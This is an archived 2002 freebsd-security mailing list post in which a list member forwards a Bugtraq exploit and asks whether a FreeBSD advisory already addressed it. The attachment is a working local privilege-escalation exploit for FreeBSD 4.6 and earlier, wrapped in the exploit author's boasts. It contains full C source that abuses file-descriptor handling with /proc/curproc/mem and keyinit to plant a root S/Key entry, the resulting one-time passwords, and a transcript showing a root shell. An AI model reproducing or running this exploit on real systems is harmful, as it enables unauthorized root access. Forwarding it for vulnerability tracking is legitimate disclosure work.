From owner-freebsd-security Mon Aug 19 16: 9:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7726D37B4B9 for ; Mon, 19 Aug 2002 16:09:32 -0700 (PDT) Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 13F2B43E3B for ; Mon, 19 Aug 2002 16:09:13 -0700 (PDT) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.5/8.12.5) with ESMTP id g7JN7wmb034653 for ; Mon, 19 Aug 2002 19:07:59 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020819190243.03854300@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Mon, 19 Aug 2002 19:06:09 -0400 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: Freebsd FD exploit Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="=====================_941369247==_" X-Virus-Scanned: amavis-20020220 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=====================_941369247==_ Content-Type: text/plain; charset="us-ascii"; format=flowed From bugtraq for those of you not on bugtraq. I take it this was addressed in FreeBSD-SA-02:23.stdio ? ---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >From: "dvdman" >To: >Subject: Freebsd FD exploit >Date: Sun, 18 Aug 2002 21:01:13 -0400 >X-Mailer: Microsoft Outlook Express 6.00.2600.0000 >X-Spam-Status: No, hits=0.0 required=5.0 tests= version=2.11 >X-Virus-Scanned: amavis-20020220 > >/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd >thought they fixed this months ago well guess again :P Thanks to the >Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */ > > --=====================_941369247==_ Content-Type: text/plain; charset="us-ascii" /* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd thought they fixed this months ago well guess again :P Thanks to the Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */ /* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE* */ DVDMAN(DVDMAN@L33TSECURITY.COM) Visit Us: irc.efnet.org #l33tsecurity www.l33tsecurity.com And Freebsd thought they fixed this :P GREETS: thanks phased for skeys from iosmash.c :) thanks all of #l33tsecurity for support thanks Georgi Guninski for ideas Details: Several months ago Joost Pol made public almost the same problem. FreeBSD fixed it, but the patch does not cover all the cases. In some cases the kernel closes fds 0..2 after they are assigned to /dev/null, leaving the system open to an attack. If a +s file is execed and fds 0..2 are opened to /proc/curproc/{special} then the kernel forcefully closes them and open() then reuses them. this program makes the following skeys valid 95: CARE LIVE CARD LOFT CHIC HILL 96: TESS OIL WELD DUD MUTE KIT 97: DADE BED DRY JAW GRAB NOV 98: MASS OAT ROLL TOOL AGO CAM 99: DARK LEW JOLT JIVE MOS WHO PROOF: [dvdman@xxxx:~]$ uname -a FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul27 20:16:20 GMT 2002 dvdman@xxxx:/usr/obj/usr/src/sys/xxx i386 [dvdman@xxxx:~]$ gcc iosmash2.c [dvdman@xxxx:~]$ ./a.out Adding dvdman: ctrl-c [dvdman@xxxx:~]$ su s/key 98 snosoft2 Password: [root@xxxx:/home/dvdman]# */ #include #include #include #include int main(int argc, char *argv[]) { int f; int ret; while(dup(1) != -1) {}; close(2); close(3); f=open("/proc/curproc/mem",O_WRONLY); if (f==-1) fprintf(stdout,"Error in open /proc\n"); fprintf(stdout,"press ctrl-c when adding..."); ret = execl("/usr/bin/keyinit","\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",0); if(ret == -1) { fprintf(stdout,"execl() failed: %s (%d)\n",strerror(errno),errno); } } --=====================_941369247==_ Content-Type: text/plain; charset="us-ascii"; format=flowed -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike --=====================_941369247==_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message